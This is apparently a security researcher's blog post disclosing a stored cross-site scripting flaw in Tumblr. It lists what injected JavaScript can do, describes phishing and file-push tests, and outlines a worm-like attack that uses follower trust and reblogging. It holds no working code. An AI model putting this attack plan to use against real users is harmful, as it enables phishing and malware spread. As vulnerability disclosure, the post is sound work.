According to my new tests, Tumblr is still vulnerable to stored Cross-site Scripting. I have reported the findings to Tumblr development team although they should already know: the reblog attack on 3rd of December was based on this vulnerability. I don’t claim “credits” for this vulnerability: all details were available before I even had time to test. What surprises me is the fact that this issue is not yet fixed.

I was asked if this vulnerability is “wormable” – meaning is it possible to perform another “Tumblr worm” attack. Why would anyone even want to try? Possible viral reblogging would be noticed and stopped fast. “Tumblr worm” was just a rather harmless demonstration.

Tumblr stored Cross-site Scripting facts

(based on my tests with two Tumblr accounts on separate PCs and three browsers)

  • It is possible to embed JavaScript and some other HTML tags to certain Tumblr post types (e.g. video post)
  • Arbitrary JavaScript can be executed on users browser from remote server
  • Before script is executed, user needs to open the blog post or click on e.g. a video containing JavaScript
  • Victim does not have to be logged in to Tumblr
  • JavaScript has access to browser cookies. However, session hijacking of logged in users is just a theoretical threat
  • JavaScript execution might be restricted to iframe-context. Accessing the main window context from the script might not be possible
  • If user reblogs a malicious post, the new post will include the payload -> spreading of code is possible

Test cases

#1 – Phishing

It would be quite easy to ask input from user in various ways. User input could be stored to attackers server. Below is a screenshot of a simple prompt asking users email address:

#2 – Spreading malware

Attacker could push malicious files from his/her server to Tumlbr users. Below is a screenshot of a simple file push using window.open:

One possible attack scenario

Attacker could create several Tumblr accounts and start blogging viral or popular videos using well chosen tags. Trust and popularity could be increased by using other accounts for reblogging video posts. Once the “attack blog” would have enough followers, attacker could create a malicious post using carefully selected tags. If the followers would reblog a malicious post, the spreading of payload would start.

Reblogging is a easy to use and popular feature of Tumblr. It is similar to Twitter’s retweet or Facebook’s “like button”. Attack that would be based on social engineering (users want to reblog interesting posts) could be more wide-spread compared to Tumblr worm attack.